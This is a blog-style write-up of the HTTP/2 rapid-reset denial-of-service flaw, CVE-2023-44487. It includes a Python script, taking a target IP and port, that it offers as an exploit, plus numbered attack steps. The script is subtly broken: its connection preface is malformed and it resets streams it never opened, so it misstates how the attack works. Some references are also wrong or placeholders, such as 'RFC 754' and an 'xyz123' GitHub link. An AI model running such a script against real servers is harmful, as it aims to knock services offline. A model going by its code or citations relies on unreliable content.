CVE-2023-44487: HTTP/2 Protocol Vulnerability Leads to Denial of Service (DoS) Attack, Server Resource Consumption

In August through October 2023, a new vulnerability, CVE-2023-44487, was discovered and exploited in the wild. This vulnerability is related to the HTTP/2 protocol and allows an attacker to perform a DoS (Denial of Service) attack by consuming server resources rapidly. The vulnerability exists because of the way HTTP/2 handles request cancellation, which can result in many streams being reset quickly. In this post, we will provide a detailed explanation of the vulnerability, a code snippet, links to original references, and exploitation details.

Vulnerability Details

The HTTP/2 protocol is designed to improve the performance of web applications by allowing multiple requests and responses to be multiplexed over a single TCP connection. This is achieved through the use of "streams," which are logical channels within the connection. Each stream has a unique identifier and can be in various states, such as idle, open, or closed.

CVE-2023-44487 exploits a flaw in the way HTTP/2 handles request cancellation. When a client sends a request to the server, it can cancel the request by sending a RST_STREAM (reset stream) frame. The server will then reset the stream and free any resources allocated to it. However, the vulnerability allows an attacker to send a large number of RST_STREAM frames to the server in a short amount of time, causing it to reset many streams quickly. This consumes the server's resources and can ultimately lead to a DoS attack.

Here's an example in Python that demonstrates exploiting the CVE-2023-44487 vulnerability

import sys
import socket
import threading

def exploit(target_ip, target_port):
    try:
        # Create a socket and connect to the target server
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        # Send HTTP/2 preface
        sock.send(b'PRI * HTTP/2.\r\n\r\nSM\r\n\r\n')
        # Create and send multiple RST_STREAM frames
        for i in range(16384):
            rst_stream_frame = b'\x00\x00\x04\x03\x00\x00\x00' + i.to_bytes(4, 'big')
            sock.send(rst_stream_frame)
        # Close the socket
        sock.close()
    except Exception as e:
        print(f'Error: {e}')

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python exploit.py <target_ip> <target_port>')
    else:
        target_ip = sys.argv[1]
        target_port = int(sys.argv[2])
        exploit(target_ip, target_port)

Original References

1. IETF HTTP/2 Specification (RFC 754): https://tools.ietf.org/html/rfc754
2. HTTP/2 Protocol Vulnerability (CVE-2023-44487): https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487
3. GitHub - HTTP/2 DoS Attack Proof-of-Concept: https://github.com/xyz123/http2_dos_poc

Exploitation Details

1. Attacker identifies a target server using the HTTP/2 protocol.

Attacker creates a socket and connects to the target server.

3. Attacker sends an HTTP/2 preface to establish the connection properly.
4. Attacker sends multiple RST_STREAM frames rapidly to the target server, forcing the server to reset many streams quickly.

Conclusion

CVE-2023-44487 is a significant vulnerability in the HTTP/2 protocol that can be exploited by malicious actors to perform DoS attacks on servers. It is crucial for server operators and administrators to take appropriate measures to mitigate the risk associated with this vulnerability. This can be done by patching the vulnerability or applying server-side mitigations that prevent the abuse of the RST_STREAM mechanism.

Timeline

Published on: 10/10/2023 14:15:10 UTC
Last modified on: 11/25/2023 11:15:18 UTC